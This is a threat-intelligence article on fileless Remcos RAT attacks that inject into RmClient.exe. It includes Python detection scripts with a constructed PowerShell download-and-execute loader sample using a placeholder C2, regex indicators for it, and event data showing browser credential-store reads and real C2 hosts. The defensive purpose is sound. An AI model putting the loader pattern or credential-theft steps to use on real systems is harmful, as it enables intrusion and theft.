Emerging Fileless Remcos Attacks Evade EDRs by Injecting Malicious Code into RMClient

In the third quarter of 2025, Remcos, a commercial remote access tool (RAT) originally designed for legitimate surveillance purposes, has emerged as the predominant infostealer in malware campaigns, accounting for approximately 11% of detected cases. Cybercriminals have adapted Remcos into sophisticated fileless attack chains that effectively bypass endpoint detection and response (EDR) systems.

Attack Methodology

The primary objective of these attacks is credential theft, with a particular emphasis on the financial sector. Recent evidence indicates that attackers have compromised legitimate websites to host additional malicious payloads, thereby expanding the reach and impact of their operations.

The attack sequence typically begins with deceptive emails containing seemingly innocuous business attachments. For instance, a file named EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz serves as the initial vector. Upon extraction, this archive deploys a batch file into the Windows temporary directory. This batch file then executes a heavily obfuscated PowerShell script, utilizing custom string de-obfuscation functions named Lotusblo and Garrots.

Analysts at CyberProof have identified that the PowerShell script initiates hidden processes while configuring web requests to use TLS 1.2 and custom User-Agent strings, making the network traffic appear legitimate. The script constructs a target file path at C:\Users\\AppData\Roaming\Hereni.Gen and enters a continuous download loop, attempting to retrieve files from a malicious command-and-control (C2) domain every four seconds.

Upon successful download, the script Base64 decodes and GZip decompresses the retrieved payload before executing it through Invoke-Expression. This method enables dynamic command execution while leaving no traces on disk, effectively evading traditional file-based detection mechanisms.
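The loader behaviour just described (TLS 1.2 forced, custom User-Agent, a drop path under AppData\Roaming, a sleep-and-retry download loop, Base64 plus GZip decoding, and Invoke-Expression) is exactly what PowerShell script block logging (Event ID 4104) exposes. The following Python is an added detection example, not code from CyberProof or from the article: it scores constructed script-block records against weighted indicators of that pattern. The sample records, the `WS-0113` host name, the placeholder C2 URL on the reserved `.invalid` TLD and the weights are all assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed PowerShell script-block log entries (Event ID 4104 style), not real captures.
# Record 1 imitates the loader behaviour the article describes: TLS 1.2 forced, a custom
# User-Agent, a drop path under AppData\Roaming, a retry loop that sleeps between download
# attempts, Base64 + GZip decoding, and Invoke-Expression. Record 2 is ordinary admin work.
# The C2 URL is a placeholder on the reserved .invalid TLD.
SAMPLE_SCRIPT_BLOCKS: List[Dict[str, object]] = [
    {
        "record_id": 1,
        "host": "WS-0113",
        "text": (
            "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\n"
            "$w = New-Object Net.WebClient; $w.Headers.Add('User-Agent','Mozilla/5.0 (placeholder)');\n"
            "$p = \"$env:APPDATA\\Hereni.Gen\";\n"
            "while ($true) { try { $w.DownloadFile('http://c2-placeholder.invalid/stage', $p); break }"
            " catch { Start-Sleep -Seconds 4 } }\n"
            "$b = [Convert]::FromBase64String((Get-Content $p -Raw));\n"
            "$ms = New-Object IO.MemoryStream(,$b);\n"
            "$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress);\n"
            "Invoke-Expression (New-Object IO.StreamReader($gz)).ReadToEnd()"
        ),
    },
    {
        "record_id": 2,
        "host": "WS-0113",
        "text": "Get-ChildItem C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Select-Object Name,Length",
    },
]

# Each indicator carries a weight; no single one is conclusive (admins legitimately force
# TLS 1.2 or decode Base64), but the combination is the loader's fingerprint.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "tls12_override": (re.compile(r"SecurityProtocolType\]::Tls12", re.I), 1),
    "custom_user_agent": (re.compile(r"Headers\.Add\(\s*['\"]User-Agent['\"]", re.I), 1),
    "appdata_drop_path": (re.compile(r"\$env:APPDATA|AppData\\Roaming", re.I), 1),
    "download_retry_loop": (re.compile(r"while\s*\(\s*\$true\s*\)[\s\S]*?DownloadFile[\s\S]*?Start-Sleep", re.I), 2),
    "base64_decode": (re.compile(r"FromBase64String", re.I), 1),
    "gzip_decompress": (re.compile(r"GzipStream[\s\S]*?Decompress", re.I), 2),
    "invoke_expression": (re.compile(r"\bInvoke-Expression\b|\biex\b", re.I), 2),
}
# Chosen so that decode + decompress + IEX alone (weight 5) stays below the bar;
# the retry loop or the AppData drop path tips a record over it.
ALERT_THRESHOLD = 6


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Return (total weight, names of matched indicators) for one script block."""
    matched = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(text)]
    return sum(INDICATORS[name][1] for name in matched), matched


def triage(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Score every record and return alerts for those at or above ALERT_THRESHOLD."""
    alerts = []
    for rec in records:
        score, matched = score_script_block(str(rec["text"]))
        if score >= ALERT_THRESHOLD:
            alerts.append({"record_id": rec["record_id"], "host": rec["host"],
                           "score": score, "indicators": matched})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"record {alert['record_id']} on {alert['host']}: "
              f"score {alert['score']} {alert['indicators']}")
```

Script block logging records the de-obfuscated code PowerShell actually executes, so the indicators match even when the batch file wrapper and the `Lotusblo`/`Garrots` string functions hide them in the on-disk script; the weighting keeps a lone `FromBase64String` in an admin script from paging anyone.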

Process Injection and Detection Evasion

A key technique employed by attackers involves leveraging msiexec.exe, a legitimate Windows installer executable, to perform process injection into RmClient.exe, a Microsoft-distributed file. This fileless approach is particularly effective against traditional EDR solutions because RmClient.exe carries legitimate digital signatures, causing many detection systems to overlook the injected Remcos payload.

Once injected, the malware immediately begins accessing browser credential stores, targeting files such as key4.db, logins.json, and Login Data, which contain saved passwords and sensitive authentication information. Network communications from the compromised RmClient.exe process are directed to command-and-control servers at ablelifepurelife.ydns.eu and icebergtbilisi.ge on non-standard ports like 57864 and 50807, revealing the attacker’s infrastructure.

The malware demonstrates persistence by spawning multiple RmClient.exe instances with random parameters stored in the temporary directory. This tactic complicates detection efforts and enables the threat actor to maintain long-term access for subsequent, potentially more destructive operations.
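Because the injected payload runs inside a legitimately signed RmClient.exe, the signal a defender has is behavioural rather than file-based: a remote thread created by msiexec.exe, RmClient.exe children of msiexec.exe with temp-directory arguments, reads of key4.db, logins.json and Login Data, and outbound connections to the reported hosts on non-standard ports. The Python below is an added example, not tooling from CyberProof or the article, that correlates constructed Sysmon/EDR-style events per process and reports which of those behaviours each PID exhibits. The credential file names and the two C2 host names come from the article; the RmClient.exe install path, the `alice` user name, the PIDs, the parent lineage and the event shapes are assumptions made for the example.

```python
from collections import defaultdict
from typing import Dict, List

# Indicators taken from the article: the browser credential stores Remcos reads and the
# reported C2 hosts. Everything else below is constructed to illustrate the chain; the
# RmClient.exe install path, user name, PIDs and lineage are placeholders, not observed values.
CREDENTIAL_STORE_FILES = {"key4.db", "logins.json", "login data"}
KNOWN_C2_HOSTS = {"ablelifepurelife.ydns.eu", "icebergtbilisi.ge"}
COMMON_PORTS = {80, 443, 8080, 8443}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


RMCLIENT = r"C:\Program Files\Placeholder\RmClient.exe"   # placeholder install path
TEMP = r"C:\Users\alice\AppData\Local\Temp"                 # placeholder user profile
MSIEXEC = r"C:\Windows\System32\msiexec.exe"

SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "pid": 4120, "image": MSIEXEC,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "msiexec.exe"},
    {"event": "ProcessCreate", "pid": 5204, "image": RMCLIENT,
     "parent_image": MSIEXEC, "cmdline": f'"{RMCLIENT}" {TEMP}\\a8f3k2q1.dat'},
    {"event": "CreateRemoteThread", "source_pid": 4120, "source_image": MSIEXEC, "target_pid": 5204},
    {"event": "FileRead", "pid": 5204, "target": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\key4.db"},
    {"event": "FileRead", "pid": 5204, "target": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\logins.json"},
    {"event": "FileRead", "pid": 5204, "target": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "NetworkConnect", "pid": 5204, "dest_host": "ablelifepurelife.ydns.eu", "dest_port": 57864},
    {"event": "ProcessCreate", "pid": 5310, "image": RMCLIENT,
     "parent_image": MSIEXEC, "cmdline": f'"{RMCLIENT}" {TEMP}\\zq77m0.dat'},
    # Benign baseline: the same binary launched normally and talking to a standard port.
    {"event": "ProcessCreate", "pid": 6000, "image": RMCLIENT,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": f'"{RMCLIENT}"'},
    {"event": "NetworkConnect", "pid": 6000, "dest_host": "updates.example.invalid", "dest_port": 443},
]


def build_profiles(events: List[dict]) -> Dict[int, dict]:
    """Fold the event stream into one behavioural profile per PID."""
    profiles: Dict[int, dict] = defaultdict(lambda: {
        "image": "", "parent_image": "", "cmdline": "",
        "injected_by": set(), "cred_files": set(), "dest": []})
    for ev in events:
        kind = ev["event"]
        if kind == "ProcessCreate":
            p = profiles[ev["pid"]]
            p["image"] = basename(ev["image"])
            p["parent_image"] = basename(ev["parent_image"])
            p["cmdline"] = ev["cmdline"]
        elif kind == "CreateRemoteThread":
            # Injection is attributed to the *target* process, which is what later misbehaves.
            profiles[ev["target_pid"]]["injected_by"].add(basename(ev["source_image"]))
        elif kind == "FileRead":
            name = basename(ev["target"])
            if name in CREDENTIAL_STORE_FILES:
                profiles[ev["pid"]]["cred_files"].add(name)
        elif kind == "NetworkConnect":
            profiles[ev["pid"]]["dest"].append((ev["dest_host"].lower(), int(ev["dest_port"])))
    return profiles


def evaluate(profiles: Dict[int, dict]) -> Dict[int, List[str]]:
    """Return, per PID, the list of rule names that fired (PIDs with no hits are omitted)."""
    findings: Dict[int, List[str]] = {}
    for pid, p in profiles.items():
        hits = []
        if "msiexec.exe" in p["injected_by"]:
            hits.append("remote_thread_from_msiexec")
        if p["image"] == "rmclient.exe" and p["parent_image"] == "msiexec.exe":
            hits.append("rmclient_spawned_by_msiexec")
        if any(m in p["cmdline"].lower() for m in TEMP_MARKERS):
            hits.append("temp_path_argument")
        if p["cred_files"]:
            hits.append("browser_credential_store_read")
        if any(port not in COMMON_PORTS for _, port in p["dest"]):
            hits.append("nonstandard_port_connection")
        if any(host in KNOWN_C2_HOSTS for host, _ in p["dest"]):
            hits.append("known_c2_host")
        if hits:
            findings[pid] = hits
    return findings


def run_detection(events: List[dict]) -> Dict[int, List[str]]:
    return evaluate(build_profiles(events))


if __name__ == "__main__":
    for pid, hits in run_detection(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(hits)}")
```

Two points of design: the injection rule keys on the target of the remote thread rather than on msiexec.exe itself, because it is the injected RmClient.exe that goes on to read credential stores and beacon, so the profile that accumulates evidence should be its own; and a single rule firing (RmClient.exe on a non-standard port, say) is a lead to look at, whereas the credential-store read plus the msiexec.exe lineage together are what justify isolating the host. The CreateRemoteThread event covers only one injection primitive; EDR telemetry that records other thread and memory-write operations should feed the same `injected_by` field.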

Implications and Defensive Measures

The emergence of these fileless Remcos attacks underscores the evolving sophistication of cyber threats and the challenges they pose to traditional security measures. Organizations must enhance their detection capabilities to identify process injection patterns and monitor unusual credential access activities, particularly those involving legitimate system binaries.

Implementing comprehensive PowerShell logging, enabling Antimalware Scan Interface (AMSI) monitoring, and deploying robust EDR solutions capable of detecting behavioral anomalies are critical steps in mitigating such threats. Additionally, educating employees about the risks associated with opening unsolicited email attachments and maintaining up-to-date security patches can further reduce the risk of compromise.

As cybercriminals continue to refine their tactics, a proactive and layered security approach is essential to protect sensitive information and maintain the integrity of organizational systems.